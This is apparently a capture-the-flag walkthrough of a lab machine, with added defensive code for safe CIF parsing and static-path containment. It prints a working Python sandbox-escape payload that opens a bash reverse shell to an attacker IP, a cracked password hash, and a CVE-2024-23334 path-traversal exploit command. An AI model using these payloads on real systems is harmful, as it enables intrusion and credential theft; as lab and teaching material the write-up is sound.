The machine exposes a web application that processes CIF files. The parser is vulnerable to Python code execution through crafted CIF metadata. A malicious CIF file provides a reverse shell. Privilege escalation is achieved by port‑forwarding an internal aiohttp service and exploiting a directory traversal vulnerability to read root files.
Target: 10.10.11.38
Initial vector: Malicious CIF file (RCE)
Privilege escalation: aiohttp path traversal (CVE‑2024‑23334)
The web application accepts CIF uploads. The CIF parser evaluates certain fields unsafely, allowing embedded Python code execution. A payload is inserted into the _space_group_magn.transform_BNS_Pp_abc field.
Example malicious CIF structure:
_space_group_magn.transform_BNS_Pp_abc
'a,b,[d for d in ().__class__.__mro__[1].__getattribute__(
*[().__class__.__mro__[1]]+["__sub" + "classes__"])()
if d.__name__ == "BuiltinImporter"][0]
.load_module("os").system("/bin/bash -c 'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1'");0,0,0'
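The field above is meant to hold a lattice transformation such as a,b,c;0,0,0, so the defensive fix is to parse that grammar explicitly instead of handing the string to an evaluator. The following parser is an added example written for this writeup, not code from the target application or from any CIF library; it assumes the field format the writeup shows (three rows in a, b, c with rational coefficients, a semicolon, three numeric shift components) and rejects anything else, so a value carrying attribute access, brackets or calls never reaches anything that could execute it.

```python
import re
from fractions import Fraction

# Allowlist for a CIF transformation string such as 'a,b,c;0,0,0': rational
# coefficients, the axis symbols a/b/c, arithmetic signs, commas, a semicolon.
_ALLOWED = re.compile(r"^[abc0-9+\-*/,;\s]+$")
# One term of a row: optional sign, then either a number (optionally times an
# axis symbol) or a bare axis symbol. The pattern never matches the empty string.
_TERM = re.compile(r"([+-]?)(?:(\d+(?:/\d+)?)(?:\*?([abc]))?|([abc]))")


class CifFieldError(ValueError):
    """Raised when a field value is not a well-formed transformation."""


def parse_linear(expr: str):
    """Parse one row like '-b+1/2' into ([coef_a, coef_b, coef_c], constant)."""
    expr = re.sub(r"\s+", "", expr)
    if not expr:
        raise CifFieldError("empty row expression")
    coefs = [Fraction(0)] * 3
    const = Fraction(0)
    pos = 0
    for m in _TERM.finditer(expr):
        if m.start() != pos:  # text between terms that no term rule accepted
            raise CifFieldError(f"unexpected text in {expr!r} at offset {pos}")
        pos = m.end()
        sign = -1 if m.group(1) == "-" else 1
        try:
            number = Fraction(m.group(2)) if m.group(2) else Fraction(1)
        except (ValueError, ZeroDivisionError) as exc:
            raise CifFieldError(f"bad coefficient in {expr!r}") from exc
        axis = m.group(3) or m.group(4)
        if axis:
            coefs["abc".index(axis)] += sign * number
        else:
            const += sign * number
    if pos != len(expr):
        raise CifFieldError(f"trailing text in {expr!r}")
    return coefs, const


def parse_transform(value: str):
    """Parse 'a,b,c;0,0,0' into a 3x3 rational matrix and a 3-vector origin shift.

    The grammar accepted here (three axis rows, a semicolon, three numeric shift
    components) is an assumption taken from the field value in the writeup;
    widen it deliberately if a larger CIF dialect has to be supported.
    """
    if not _ALLOWED.fullmatch(value):
        raise CifFieldError("value contains characters outside the allowlist")
    parts = value.split(";")
    if len(parts) != 2:
        raise CifFieldError("expected '<rows>;<shift>'")
    rows = parts[0].split(",")
    shifts = parts[1].split(",")
    if len(rows) != 3 or len(shifts) != 3:
        raise CifFieldError("expected three rows and three shift components")
    matrix = []
    for row in rows:
        coefs, const = parse_linear(row)
        if const != 0:
            raise CifFieldError("constant offsets belong in the shift part")
        matrix.append(coefs)
    shift = []
    for comp in shifts:
        coefs, const = parse_linear(comp)
        if any(coefs):
            raise CifFieldError("shift components must be numeric")
        shift.append(const)
    return matrix, shift


def is_safe_transform(value: str) -> bool:
    """True when the value parses under the allowlist grammar, False otherwise."""
    try:
        parse_transform(value)
        return True
    except CifFieldError:
        return False


if __name__ == "__main__":
    # Constructed samples: two legitimate settings and one that smuggles Python syntax.
    for sample in ("a,b,c;0,0,0", "-b,a,c;0,0,1/2", "a,b,c.__class__;0,0,0"):
        verdict = "accepted" if is_safe_transform(sample) else "rejected"
        print(f"{sample!r}: {verdict}")
```

The allowlist regex alone would stop the payload shown above, but the term-level parser matters too: it turns the string into numbers the rest of the program can use, so there is no remaining reason to evaluate the text anywhere downstream.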
Upload the file, click the generated link, and the payload executes. A listener on the attacker machine receives the shell:
$ nc -nlvp 4444
Once inside, database.db contains user hashes. Extracting strings reveals a hash for rosa:
63ed86ee9f624c7b14f1d4f43dc251a5 -> unicorniosrosados
Switch user:
$ su rosa
Password: unicorniosrosados
Local enumeration shows an internal service on port 8080.
$ netstat -nat -> 127.0.0.1:8080
Port‑forward it:
$ ssh rosa@10.10.11.38 -L 8080:127.0.0.1:8080
Accessing http://localhost:8080 reveals an aiohttp application.
The version is vulnerable to CVE‑2024‑23334 (path traversal).
Exploit reference:
https://github.com/wizarddos/CVE-2024-23334/blob/master/exploit.py
The correct static directory must be identified (in this case: /assets).
Exploit to read root flag:
$ python3 exploit.py -u http://127.0.0.1:8080 -f /root/root.txt -d /assets
The response contains the root flag.
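The traversal works because the static handler resolves the request path without confirming that the result still lies under the configured directory. The check below is an added example written for this writeup, not aiohttp's own code; it assumes a static root such as /assets and shows the three normalisations a static handler has to apply before serving (percent-decoding, collapsing .. segments, resolving symlinks) and the containment test that follows them. The last function builds a throwaway directory with a symlink pointing outside the root to show that a lexically in-bounds path is still rejected.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional
from urllib.parse import unquote


def resolve_static(root: str, url_path: str) -> Optional[str]:
    """Map the path part of a static-file request onto a file under `root`.

    Returns the canonical filesystem path, or None when the request would land
    outside `root` after percent-decoding, '..' normalisation and symlink
    resolution. A handler should serve only what this returns.
    """
    base = Path(root).resolve()
    relative = unquote(url_path).lstrip("/")
    try:
        # resolve() turns '..' segments and symlinks into their real targets,
        # so the containment check afterwards sees the actual destination.
        candidate = (base / relative).resolve()
    except ValueError:  # e.g. an embedded NUL byte after decoding
        return None
    if not candidate.is_relative_to(base):  # Python 3.9+
        return None
    return str(candidate)


def symlink_escape_rejected() -> bool:
    """Constructed check: assets/link -> ../secret.txt must not be served,
    a plain '..' escape must not be served, and an ordinary file must be."""
    with tempfile.TemporaryDirectory() as tmp:
        assets = Path(tmp) / "assets"
        assets.mkdir()
        secret = Path(tmp) / "secret.txt"
        secret.write_text("outside the static root")
        os.symlink(secret, assets / "link")
        return (
            resolve_static(str(assets), "/link") is None
            and resolve_static(str(assets), "/../secret.txt") is None
            and resolve_static(str(assets), "/style.css")
            == str((assets / "style.css").resolve())
        )


if __name__ == "__main__":
    # Constructed requests against a hypothetical static root.
    for req in ("/css/site.css", "/../../../root/root.txt", "/%2e%2e/%2e%2e/etc/passwd"):
        print(f"{req!r} -> {resolve_static('/srv/app/assets', req)}")
    print("symlink escape rejected:", symlink_escape_rejected())
```

In aiohttp itself the equivalent configuration point is the static route's follow_symlinks option (web.static(prefix, path, follow_symlinks=False), the default); CVE-2024-23334 concerns deployments that enabled it on an unpatched version, so the practical remediation is to upgrade and keep that option off unless the symlink targets are themselves inside the served tree.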
The machine relies on insecure CIF parsing to achieve initial RCE. After pivoting to the rosa user, an internal aiohttp service is exposed and exploited using a directory traversal vulnerability.
The final exploit retrieves /root/root.txt directly.